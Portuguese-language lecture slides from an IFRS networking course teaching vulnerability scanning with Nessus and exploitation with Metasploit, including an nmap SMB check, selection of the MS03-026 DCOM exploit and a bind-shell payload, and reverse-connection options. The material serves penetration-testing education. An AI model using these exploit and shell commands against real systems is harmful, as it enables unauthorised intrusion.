1. Tecnologia em Redes de
Computadores
Gerência de Redes
Prática de Ataques – Nessus e Metaesploit
Professor: André Peres
andre.peres@poa.ifrs.edu.br
Instituto Federal do Rio Grande do Sul - IFRS
Porto Alegre
2. Nessus
O Nessus é uma ferramenta para scan de
vulnerabilidades em hosts
Para utilizar:
1. faça o download do nessus
http://www.tenable.com/products/nessus/nessus-download-agreement
2. instale o pacote
Crie usuário, baixe base,...
3. acesse através de
https://ip_nessus:8834
3. Nessus
É possível criar uma política de scan, ou
utilizar uma pré-definida...
Na política se define, entre outras coisas, os
plugins a serem utilizados nos testes...
4. Nessus
Após a criação da política, se cria o scan,
contendo:
- nome (descrição do scan)
- tipo (agendamento)
- política a ser aplicada
- lista de alvos
→ launch scan...
5. Nessus
Após o scan, é gerado um relatório contendo
as vulnerabilidades encontradas e:
- classificação
- descrição
- possível correção
7. Nessus
O Nessus gera um relatório completo com
todas as vulnerabilidades encontradas
(testadas de acordo com sua base de dados)
Para que se verifique se a vulnerabilidade
pode ser explorada → metaesploit
8. MetaEsploit
O MetaEsploit é um conjunto de exploits
capazes de realizar testes de
vulnerabilidades através da sua exploração.
Foi desenvolvido para pen-tests... porém pode
ser utilizado por usuários maliciosos
9. MetaEsploit
Instalação:
1. download do pacote (http://metasploit.com/)
2. instalação...
3. executar o console: ….../bin/msfconsole
Ou
3. executar interface gráfica: …../bin/msfgui
10. MetaEsploit
Alguns comandos do console:
Mostra todos os exploits disponíveis:
msf > show exploits
Procurando por um exploit específico (ex: smb)
msf > search smb
Mostra todos os payloads disponíveis:
msf > show payloads
11. MetaEsploit
Realizando um ataque:
1. Identificação de vulnerabilidade em alvo (ex: nessus)
ou... executando uma varredura no alvo com nmap no console do
metasploit:
msf > nmap -sT -A --script=smb-check-vulns -P0 192.168.0.159
script que testa para vulnerabilidade no SMB
(ex: windows 2000 server, XP com SP2)
12. MetaEsploit
Scripts no NMAP...
- detecção de hosts
- detecção de vulnerabilidades
-……
http://nmap.org/presentations/BHDC10/
http://nmap.org/nsedoc/
13. MetaEsploit
Realizando um ataque:
2. selecionar o exploit a ser utilizado (search?)
msf > use exploit/windows/dcerpc/ms03_026_dcom
3. selecionar o payload (código a ser executado)
msf > set payload windows/shell/bind_tcp
15. MetaEsploit
Realizando um ataque:
Adicionalmente (após o “use”):
show payloads → payloads compatíveis com exploit
show targets → versões de SO afetadas pelo exploit
set target → versão do SO alvo
set LHOST → ip local (em caso de ataque com conexão reversa)
set LPORT → porta local (conexão reversa)
show options → opções selecionadas para o exploit